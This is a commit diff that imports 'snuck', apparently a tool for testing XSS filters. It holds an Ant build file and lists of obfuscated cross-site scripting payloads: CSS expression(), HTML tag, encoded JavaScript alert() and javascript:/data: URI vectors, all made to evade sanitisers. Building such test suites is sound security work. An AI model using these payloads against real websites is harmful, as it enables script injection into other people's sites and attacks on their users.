Initial import

build.xml

@@ -0,0 +1,81 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<project basedir="." default="build" name="snuck">
+    <property environment="env"/>
+    <property name="debuglevel" value="source,lines,vars"/>
+    <property name="target" value="1.6"/>
+    <property name="source" value="1.6"/>
+    <path id="snuck.classpath">
+        <pathelement location="bin"/>
+        <pathelement location="lib/selenium-java-2.25.0.jar"/>
+        <pathelement location="lib/htmlunit-2.9.jar"/>
+        <pathelement location="lib/commons-lang-2.6.jar"/>
+        <pathelement location="lib/guava-12.0.jar"/>
+        <pathelement location="lib/htmlunit-core-js-2.9.jar"/>
+        <pathelement location="lib/commons-io-2.0.1.jar"/>
+        <pathelement location="lib/commons-codec-1.6.jar"/>
+        <pathelement location="lib/httpclient-4.1.3.jar"/>
+        <pathelement location="lib/sac-1.3.jar"/>
+        <pathelement location="lib/commons-logging-1.1.1.jar"/>
+        <pathelement location="lib/apache-mime4j-0.6.jar"/>
+        <pathelement location="lib/httpcore-4.1.3.jar"/>
+        <pathelement location="lib/httpmime-4.1.3.jar"/>
+        <pathelement location="lib/commons-collections-3.2.1.jar"/>
+        <pathelement location="lib/cssparser-0.9.5.jar"/>
+        <pathelement location="lib/xercesImpl-2.9.1.jar"/>
+        <pathelement location="lib/nekohtml-1.9.15.jar"/>
+        <pathelement location="lib/xalan-2.7.1.jar"/>
+        <pathelement location="lib/json-20080701.jar"/>
+        <pathelement location="lib/commons-exec-1.1.jar"/>
+    </path>
+    <target name="init">
+        <mkdir dir="bin"/>
+        <copy includeemptydirs="false" todir="bin">
+            <fileset dir="src">
+                <exclude name="**/*.java"/>
+            </fileset>
+        </copy>
+    </target>
+    <target name="clean">
+        <delete dir="bin"/>
+    </target>
+    <target depends="clean" name="cleanall"/>
+    <target depends="build-project" name="build"/>
+    <target name="build-subprojects"/>
+    <target depends="init" name="build-project">
+        <echo message="${ant.project.name}: ${ant.file}"/>
+        <javac includeantruntime="false" debug="true" debuglevel="${debuglevel}" destdir="bin" source="${source}" target="${target}">
+            <src path="src"/>
+            <classpath refid="snuck.classpath"/>
+        </javac>
+    </target>
+
+    <target name="jar" depends="build" description="create a jar">
+      <jar destfile="snuck.jar" filesetmanifest="mergewithoutmain">
+            <manifest>
+                <attribute name="Main-Class" value="core.Starter"/>
+                <attribute name="Class-Path" value="."/>
+            </manifest>
+            <fileset dir="bin"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/selenium-java-2.25.0.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/htmlunit-2.9.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/commons-lang-2.6.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/guava-12.0.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/htmlunit-core-js-2.9.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/commons-io-2.0.1.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/commons-codec-1.6.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/httpclient-4.1.3.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/sac-1.3.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/commons-logging-1.1.1.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/apache-mime4j-0.6.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/httpcore-4.1.3.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/httpmime-4.1.3.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/commons-collections-3.2.1.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/cssparser-0.9.5.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/xercesImpl-2.9.1.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/nekohtml-1.9.15.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/xalan-2.7.1.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/json-20080701.jar"/>
+            <zipfileset excludes="META-INF/*.SF" src="lib/commons-exec-1.1.jar"/>
+        </jar>
+    </target>
+</project>

payloads/expression_alert_payloads

@@ -0,0 +1,6 @@
+expression(URL=0)
+expr\65 ssion(URL=0)
+expr\65 ss/*???*/ion(URL=0);
+expression\28URL=0\29
+expr\65 ss/*\%/ion\28URL=0\29
+\000045xpr\000065 ss/*BlABl/\\aaaaa!!!*/ion\28URL=0)

payloads/html_payloads

@@ -0,0 +1,10 @@
+<script src=data:,%alert%></script>
+<script>/**///**/alert(1)</script>
+<img src=xx:x onerror=%alert% />
+<iframe onload=%alert%></iframe>
+<frameset onload=%alert%>
+<object data=%uri%>
+<svg onload=javascript:alert(2)//
+<video onerror=%uri%><source>
+<svg><script>%alert%</script>
+<svg onload=%uri%>

payloads/js_alert_payloads

@@ -0,0 +1,16 @@
+alert(1)
+alert(String.fromCharCode(49))
+alert(/1/.source)
+eval('alert(1)')
+this['EvAL'.toLowerCase()]('aLErT(1)'.toLowerCase())
+(alert(1)).replace(/.+/,eval);
+\u0061\u006c\u0065\u0072\u0074(1)
+eval('\u00' + '6' + '1'+'le' + '\u0072' + 't(1)')
+eval('\141\154\145\162\164\50\61\51')
+eval('\x61\x6c\x65\x72\x74(1)')
+eval('\x61ler\x74(1)')
+top['a\x6Cert'](1)
+x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
+setTimeout('alert(1)',0)
+setTimeout(\u0061\u006c\u0065\u0072\u0074(1),0);
+onerror=eval;throw'alert\x281\x29';

payloads/uri_payloads

@@ -0,0 +1,14 @@
+javascript:alert(1)
+ javascript:alert(1)
+javascript:alert(1)
+javascript:alert(1)
+javAscRipt:alert(1)
+javAscRipt:alert(1)
+feed:javascript:alert(1)
+feed:javascript:alert(1)
+feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e
+feed:data:text/html,%3csvg%20onload=alert%281%29%3e
+data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
+data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
+data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
+data:_;;;:;base64_______,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==